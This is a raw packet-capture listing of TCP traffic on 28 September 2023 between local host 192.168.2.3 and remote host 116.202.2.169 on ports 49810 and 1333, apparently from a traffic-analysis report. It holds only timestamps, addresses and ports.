                                                                                              Sep 28, 2023 06:02:00.434497118 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.434528112 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.434540033 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.434575081 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.434586048 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.434617043 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.434643984 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.434689999 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.434726954 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.434772015 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.434779882 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.434817076 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.434828997 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.434854984 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.434861898 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.434906006 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.434909105 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.434953928 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.434990883 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435023069 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435035944 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435066938 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435089111 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435134888 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435153961 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435208082 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435218096 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435252905 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435262918 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435292959 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435314894 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435332060 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435357094 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435365915 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435379028 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435410023 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435415983 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435461044 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435498953 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435544014 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435559988 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435606003 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435642958 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435688019 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435700893 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435749054 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435758114 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435791969 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435801983 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435832977 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435838938 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435883999 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.435916901 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.435962915 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.442550898 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.442775011 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.442794085 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.442812920 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.442830086 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.442847013 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.442848921 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.442866087 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.442878962 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.442878962 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.442899942 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.442914963 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.442917109 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.442960978 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.442970991 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443006039 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443059921 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443113089 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443141937 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443171024 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443255901 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443274975 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443275928 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443275928 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443275928 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443310976 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443340063 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443355083 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443355083 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443380117 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443392992 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443448067 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443448067 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443499088 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443505049 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443533897 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443556070 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443577051 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443634987 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443664074 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443689108 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443691969 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443707943 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443747997 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443769932 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443820953 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443846941 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443875074 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443897009 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443917036 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443928957 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.443975925 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.443984032 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444031954 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444152117 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444204092 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444205046 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444253922 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444261074 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444308996 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444335938 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444365025 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444387913 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444412947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444418907 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444472075 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444473982 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444525957 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444526911 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444577932 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444578886 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444607973 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444628000 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444648981 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444660902 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444690943 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444720030 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444741011 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444767952 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444817066 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444818974 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444868088 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444871902 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444921017 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444926977 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.444977999 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.444982052 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445034981 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445036888 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445086002 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445091009 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445138931 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445142031 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445171118 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445189953 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445214987 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445247889 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445296049 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445348978 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445377111 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445405006 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445405006 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445425987 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445435047 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445449114 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445485115 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445491076 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445543051 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445569992 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445621967 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445624113 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445673943 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445677996 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445725918 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445777893 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445806026 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.445826054 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.445851088 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446393967 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446424007 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446463108 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446491957 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446504116 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446504116 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446504116 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446520090 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446535110 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446547985 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446566105 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446576118 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446597099 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446603060 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446618080 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446656942 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446681023 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446731091 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446732998 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446783066 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446832895 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446861029 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446883917 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446902037 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446912050 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.446963072 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.446966887 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447017908 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447021008 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447072029 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447073936 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447123051 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447171926 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447221994 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447273016 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447321892 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447375059 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447403908 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447423935 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447433949 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447448015 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447463989 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447480917 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447491884 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447518110 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447535992 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447570086 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447621107 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447623014 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447652102 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447674036 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447691917 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447727919 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447757959 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447783947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447805882 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447809935 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447859049 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447861910 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447911024 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447916031 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.447967052 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.447968960 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448016882 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448024988 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448080063 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448086977 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448136091 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448139906 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448193073 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448194981 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448242903 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448293924 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448343039 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448391914 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448445082 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448446035 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448496103 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448544979 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448600054 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448651075 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448679924 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448708057 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448739052 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448760986 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448791981 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448813915 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448832989 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448868036 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448915958 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448920012 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.448971987 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.448978901 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449027061 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449031115 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449079990 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449110031 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449141979 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449163914 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449182034 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449193954 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449243069 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449248075 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449295998 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449311972 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449341059 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449361086 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449382067 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449417114 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449465036 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449470043 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449518919 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449546099 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449574947 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449598074 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449615002 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449650049 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449681997 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449702978 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449721098 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449755907 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449784040 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449804068 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449824095 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449835062 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449881077 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449887991 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449940920 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449944973 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.449995041 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.449999094 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.450045109 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.450076103 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.450103045 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.450124025 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.450130939 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.450141907 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.450180054 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.450185061 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.450233936 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.450413942 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.450485945 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.450489998 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.450536013 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.450541019 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.450589895 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.450593948 CEST133349810116.202.2.169192.168.2.3
